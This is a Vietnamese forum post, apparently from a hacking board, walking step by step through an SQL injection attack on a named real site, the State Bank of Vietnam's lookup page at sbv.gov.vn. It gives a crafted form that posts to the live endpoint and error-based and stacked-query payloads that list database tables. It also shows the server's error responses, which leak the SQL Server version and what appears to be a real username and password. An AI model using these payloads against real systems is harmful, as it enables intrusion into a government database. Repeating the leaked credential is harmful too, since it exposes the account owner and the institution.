back lại test.html lt type vào : Trích: '; begin declare @temp varchar8000 set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into langtu en
Trang 1<option value="ANGIANG">An Giang</option>
<option value="BARIAVUNGTAU">Bà Rịa-Vũng Tàu</option>
<option value="BINHDINH">Bình Định</option>
<option value="BINHDUONG">Bình Dương</option>
<option value="BINHPHUOC">Bình Phước</option>
<option value="BINHTHUAN">Bình Thuận</option>
<option value="BACLIEU">Bạc Liêu</option>
<option value="BACCAN">Bắc Cạn</option>
<option value="BACGIANG">Bắc Giang</option>
<option value="BACNINH">Bắc Ninh</option>
<option value="BENTRE">Bến Tre</option>
<option value="CAMAU">Cà Mau</option>
<option value="CAOBANG">Cao Bằng</option>
<option value="GIALAI">Gia Lai</option>
<option value="HAGIANG">Hà Giang</option>
<option value="HANOI">Hà Nội</option>
<option value="HANAM">Hà Nam</option>
<option value="HATAY">Hà Tây</option>
Trang 2
<option value="HATINH">Hà Tĩnh</option>
<option value="HAIDUONG">Hải Dương</option>
<option value="HAIPHONG">Hải Phòng</option>
<option value="HAUGIANG">Hậu Giang</option>
<option value="HUNGYEN">Hưng Yên</option>
<option value="HOABINH">Hoà Bình</option>
<option value="KHANHHOA">Khánh Hoà</option>
<option value="KIENGIANG">Kiên Giang</option>
<option value="KONTUM">Kon Tum</option>
<option value="LAOCAI">Lào Cai</option>
<option value="LAMDONG">Lâm Đồng</option>
<option value="LANGSON">Lạng Sơn</option>
<option value="LAICHAU">Lai Châu</option>
<option value="LONGAN">Long An</option>
<option value="NAMDINH">Nam Định</option>
<option value="NGHEAN">Nghệ An</option>
<option value="NINHBINH">Ninh Bình</option>
<option value="NINHTHUAN">Ninh Thuận</option>
Trang 3<option value="PHUTHO">Phú Thọ</option>
<option value="PHUYEN">Phú Yên</option>
<option value="QUANGBINH">Quảng Bình</option>
<option value="QUANGNAM">Quảng Nam</option>
<option value="QUANGNGAI">Quảng Ngãi</option>
<option value="QUANGNINH">Quảng Ninh</option>
<option value="QUANGTRI">Quảng Trị</option>
<option value="SOCTRANG">Sóc Trăng</option>
<option value="SONLA">Sơn La</option>
<option value="TAYNINH">Tây Ninh</option>
<option value="THAIBINH">Thái Bình</option>
<option value="THAINGUYEN">Thái Nguyên</option>
<option value="THUATHIENHUE">Thừa Thiên Huế</option>
<option value="THANHHOA">Thanh Hoá</option>
<option value="TIENGIANG">Tiền Giang</option>
<option value="TPHCM">TP Hồ Chí Minh</option>
<option value="TPHUE">TP Huế</option>
<option value="TRAVINH">Trà Vinh</option>
Trang 4
<option selected value="TW">Trung Ương</option>
<option value="TUYENQUANG">Tuyên Quang</option>
<option value="VINHLONG">Vĩnh Long</option>
<option value="VINHPHUC">Vĩnh Phúc</option>
<option value="YENBAI">Yên Bái</option>
</select></p>
</form>
oài ! thấy có cả daklak trong đó ( quê nhà mà hê hê ) thôi thì thữ coppy về và edit 1 xí xem sao :
Code:
<form name="Tim" method="post"
action="http://www.sbv.gov.vn/home/hethongTCTDHT.asp" autocomplete="on">
<input type="text" size="100" name="lstTinh">
<input name="submit" type="submit" value="submit">
</form>
langtu save lại thành file test.html và mở ra type dô cái input vài dòng thữ xem sao :
Code:
' or 1=(@@version)
và submit óe nó hiện ra cái gì đây :eek: :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on
Trang 5Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int
/home/hethongTCTDHT.asp, line 172
hề hề ! Sql inject cực nặng rồi nhé ! back lại test.html lt type vào :
Trích:
'; begin declare @temp varchar(8000) set @temp='' select
@temp=@temp+table_name+'/' from information_schema.tables select @temp as
id into langtu end
Đoạn query trên có nghĩa là gì ?? declare @temp varchar(8000) là khai báo cho
@temp rỗng và varchar(8000) ( cái này giống như kiểu khai báo biến trong các ngôn ngữ lập trình khác í mà ) tiếp theo là : set @temp='' select
@temp=@temp+table_name+'/' from information_schema.tables cái này là đặt điều kiện cho @temp seclect ra table và tiếp tục cộng thêm 1 table tiếp theo ngăn cách bằng " / " ! select @temp as id into langtu end chọn @temp ờ cột id và trong table langtu ! Chắc phần nào hiểu rồi chứ hí hí !
Ok ! sau khi submit query trên ta sẽ được trả về
http://www.sbv.gov.vn/home/hethongTCTDHT.asp và ko bị báo lỗi gì cả thì ta đã thành công !
Tiếp theo langtu sẽ select ra tất cả các table trong user data "dthai" mà sbv đang sữ dụng :
Code:
' or 1=(select id from langtu)
được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int
/home/hethongTCTDHT.asp, line 172